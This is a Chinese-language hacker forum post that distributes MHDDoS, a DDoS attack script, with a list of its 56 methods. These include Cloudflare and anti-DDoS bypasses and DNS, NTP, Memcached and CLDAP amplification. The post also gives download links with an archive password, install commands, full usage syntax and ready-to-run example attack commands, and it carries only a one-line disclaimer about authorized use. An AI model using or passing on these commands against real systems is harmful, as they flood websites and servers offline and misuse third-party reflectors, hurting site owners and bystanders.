Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

MHDDoS 56种方法的DDoS攻击脚本 内置下载地址

 Share


Recommended Posts

注意事项:

仅可作为研究具备授权的测试使用。
未经所有者同意,请勿用于攻击。

特点和方法

  • ?第 7 层
    • GET|GET洪水
    • POST| POST洪水
    • OVH | 绕过OVH
    • RHEX | 随机十六进制
    • STOMP  | 绕过 chk_captcha
    •  STRESS | 发送高字节的 HTTP 数据包
    • DYN | 一种带有随机子域的新方法
    • DOWNLOADER  | 一种慢读数据的新方法
    • SLOW | Slowloris 旧的 DDoS 方法
    • HEAD  | hdeveloper.mozilla.org/en-US/docs/Web/HTTP/Methods/HEAD
    • NULL  | 空用户代理和…
    • COOKIE  | 随机 Cookie PHP ‘if (isset($_COOKIE))’
    • PPS  | 只有 ‘GET / HTTP/1.1\r\n\r\n’
    • EVEN  | 带有更多标头的 GET 方法
    • GSB | 谷歌项目屏蔽绕过
    • DGB | DDoS 防护绕过
    • AVB | Arvan 云绕过
    • BOT  | 像谷歌机器人
    • 阿帕奇 | 阿帕奇漏洞
    • XMLRPC | WP XMLRPC expliot(添加 /xmlrpc.php)
    • CFB  | CloudFlare 绕过
    • CFBUAM | 攻击模式下的 CloudFlare 绕过
    • BYPASS  | 绕过正常的AntiDDoS
    • BOMB  | 绕过codeenberg/bombardier
    • ?KILLER  | 运行多个线程来杀死一个目标
    • ?TOR  | 绕过洋葱网站
  • ?第 4 层:
    • 技术支持 | TCP 洪水绕过
    • UDP | UDP洪水绕过
    •  SYN | SYN 洪水
    • CPS | 使用代理打开和关闭连接
    • ICMP | Icmp 回显请求洪水(Layer3)
    • 连接| 使用代理打开连接
    • VSE | 发送 Valve Source Engine 协议
    • TS3 | 发送 Teamspeak 3 状态 Ping 协议
    • FIVEM  | 发送 Fivem 状态 Ping 协议
    • MEM  | Memcached 放大
    • NTP | NTP 放大
    • MCBOT | 我的世界机器人攻击
    • MINECRAFT  | Minecraft 状态 Ping 协议
    • MCPE | Minecraft PE 状态 Ping 协议
    • DNS  | DNS 放大
    • CHAR  | 电荷放大
    • CLDAP | Cldap扩增
    • ARD  | Apple 远程桌面放大攻击
    • RDP | 远程桌面协议放大攻击
  • ⚙️工具 – 运行 python3 start.py tools
    • ?CFIP | 查找由 Cloudflare 提供支持的网站的真实 IP 地址
    • ?DNS  | 显示站点的 DNS 记录
    • ? TSSRV | TeamSpeak SRV 解析器
    • ⚠ PING  | PING 服务器
    • ?CHECK  | 检查网站状态
    • ?DSTAT  | 显示接收的字节数、发送的字节数及其数量
  • ?其他
    • ❌STOP  | 停止所有攻击
    • ?TOOLS  | 控制台工具
    • ?HELP  | 显示使用脚本

安装条件

Requirements

下载地址

github.com/MatrixTM/MHDDoS 2.4.zip

云中转网盘:

yunzhongzhuan.com/#sharefile=Ac5FNRm3_98239
解压密码:www.ddosi.org

安装方法

自动安装

git clone https://github.com/MatrixTM/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt

DockerFile

docker pull ghcr.io/mhprodev/mhddos:latest

手动安装

python3 -m pip install cfscrape<=2.1.1
python3 -m pip install certifi<=2021.10.8
python3 -m pip install dnspython>=2.2.0
python3 -m pip install requests==2.27.1
python3 -m pip install impacket==0.9.23
python3 -m pip install psutil>=5.9.0
python3 -m pip install icmplib>=2.1.1
python3 -m pip install git+https://github.com/MHProDev/PyRoxy.git
python3 -m pip install yarl~=1.7.2

VPS 上的单行安装

apt -y update && apt -y install curl wget libcurl4 libssl-dev python3 python3-pip make cmake automake autoconf m4 build-essential ruby perl golang git && git clone https://github.com/MatrixTM/MHDDoS.git && cd MH* && pip3 install -r requirements.txt

使用方法

视频

教程

文档:

https://github.com/MatrixTM/MHDDoS/wiki

脚本用法

  • 第七层:
python3 start.py <1=method> <2=url> <3=socks_type> <4=threads> <5=proxylist> <6=rpc> <7=duration> <8=debug=optional>
  • 1:方法(攻击类型)
    • 2:目标 URL 或 IP 地址
    • 3:代理版本(代理使用
    • 4:代理文件(代理文件格式
    • 5:要使用的线程数(多线程
    • 6:RPC(请求预连接)
    • 7:持续时间(以秒为单位完成攻击的时间)
    • 8:调试模式(可选)
  • 第 4 层正常:
python3 start.py <1=method> <2=ip:port> <3=threads> <4=duration> <5=debug=optional>
  • 1:方法(攻击类型)
    • 2:目标 URL 或 IP 地址
    • 3:要使用的线程数(多线程
    • 4:持续时间(以秒为单位完成攻击的时间)
    • 5:调试模式(可选 –什么是调试模式
  • 第 4 层代理:
python3 start.py <1=method> <2=ip:port> <3=threads> <4=duration> <5=socks_type> <6=proxylist> <7=debug=optional>
  • 1:方法(攻击类型)
    • 2:目标 URL 或 IP 地址
    • 3:要使用的线程数(多线程
    • 4:持续时间(以秒为单位完成攻击的时间)
    • 5:代理版本(代理使用
    • 6:代理文件(代理文件格式
    • 7:调试模式(可选)
  • 第 4 层放大:
python3 MHDDoS/start.py <1=method> <2=ip:port> <3=threads> <4=duration> <5=reflector file> <6=debug=optional>
  • 1:方法(攻击类型)
    • 2:目标 URL 或 IP 地址
    • 3:要使用的线程数(多线程
    • 4:持续时间(以秒为单位完成攻击的时间)
    • 5:反射器文件(反射器文件
    • 6:调试模式(可选)

使用示例

第 7 层(网站):

# Running bypass attack from 101 threads, 
# with socks 5, 100 requests per proxy (connection), for 3600 seconds  
python start.py bypass https://example.com 5 101 socks5.txt 100 3600
# Running bomb attack from 50 threads (be careful must be < 300)
# with all proxies (0), 100 requests per proxy (connection), for 3600 seconds
python start.py bomb https://example.com 0 50 proxy.txt 100 3600

第 4 层(服务器/家庭):

# Running udp attack from 1 threads, for 3600 seconds  
python start.py udp 1.1.1.1:53 1 3600
# Running dns attack from 100 threads, for 3600 seconds  
# with reflector servers from dns.txt, for 3600 seconds  
python start.py dns 1.1.1.1:53 100 3600 dns.txt
# Running minecraft attack from 1000 threads
# with socks 5, for 3600 seconds  
python start.py minecraft 1.1.1.1:53 1000 3600 5 socks5.txt

调试模式(攻击状态日志)

python start.py bypass https://example.com 5 1000 socks5.txt 100 100 true
python start.py udp 1.1.1.1:53 1 100 true
python start.py dns 1.1.1.1:53 1 100 dns.txt true
python start.py minecraft 1.1.1.1:53 1 100 5 socks5.txt true

帮助命令:

python start.py tools
python start.py help

代理支持清单

代理文件格式:

<Type>://<Host>:<Port>:<User=Optional>:<Password=Optional>

例如:

socks5://1.1.1.1:20001
socks4://1.1.1.1:46527
http://1.1.1.1:443:username:password
http://1.1.1.1:80

代理类型

代理类型 参数
所有代理 0
HTTP 1
SOCKS4 4
SOCKS5 5
RANDOM 6

使用代理到第四层的方法

代理类型 MINECRAFT MCBOT MEM RDP NTP TCP ARD VSE SYN UDP CHAR
HTTP ✅ ✅ ❌ ❌ ❌ ✅ ❌ ❌ ❌ ❌ ❌
SOCKS4 ✅ ✅ ❌ ❌ ❌ ✅ ❌ ❌ ❌ ❌ ❌
SOCKS5 ✅ ✅ ❌ ❌ ❌ ✅ ❌ ❌ ❌ ❌ ❌
Proxy Type CONNECTION CPS DNS TS3 MCPE CLDAP FIVEM
HTTP ✅ ✅ ❌ ❌ ❌ ❌ ❌
SOCKS4 ✅ ✅ ❌ ❌ ❌ ❌ ❌
SOCKS5 ✅ ✅ ❌ ❌ ❌ ❌ ❌

使用代理到第7层的方法

代理类型 COOKIE BYPASS OVH DGB STRESS DOWNLOADER BOMB NULL AVB GET
HTTP ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅
SOCKS4 ✅ ✅ ✅ ✅ ✅ ✅ ❌ ✅ ✅ ✅
SOCKS5 ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅
代理类型 CFB POST EVEN DYN GSB XMLRPC SLOW BOT PPS CFBUAM APACHE
HTTP ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅
SOCKS4 ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅
SOCKS5 ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅
代理类型 KILLER RHEX STOMP
HTTP ✅ ✅ ✅
SOCKS4 ✅ ✅ ✅
SOCKS5 ✅ ✅ ✅

测试截图

MHDDoS 具有56种方法的DDoS攻击脚本
└─# python3 start.py                            
* MHDDoS - DDoS Attack Script With 52 Methods
Note: If the Proxy list is empty, the attack will run without proxies
      If the Proxy file doesn't exist, the script will download proxies and check them.
      Proxy Type 0 = All in config.json
      SocksTypes:
         - 6 = RANDOM
         - 5 = SOCKS5
         - 4 = SOCKS4
         - 1 = HTTP
         - 0 = ALL
 > Methods:
 - Layer4
 | MINECRAFT, VSE, MCPE, DNS, TCP, CHAR, RDP, MEM, NTP, CONNECTION, CLDAP, CPS, SYN, TS3, MCBOT, FIVEM, ARD, UDP | 18 Methods
 - Layer7
 | GSB, GET, KILLER, APACHE, DGB, NULL, STRESS, COOKIE, XMLRPC, BOT, TOR, HEAD, POST, BYPASS, BOMB, DYN, CFBUAM, OVH, EVEN, SLOW, PPS, DOWNLOADER, AVB, CFB | 24 Methods
 - Tools
 | CFIP, DSTAT, PING, INFO, CHECK, DNS, TSSRV | 7 Methods
 - Others
 | TOOLS, HELP, STOP | 3 Methods
 - All 52 Methods

Example:
   L7: python3 start.py <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>
   L4: python3 start.py <method> <ip:port> <threads> <duration>
   L4 Proxied: python3 start.py <method> <ip:port> <threads> <duration> <socks_type> <proxylist>
   L4 Amplification: python3 start.py <method> <ip:port> <threads> <duration> <reflector file (only use with Amplification)>

项目地址

GitHub:

https://github.com/MatrixTM/MHDDoS

Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...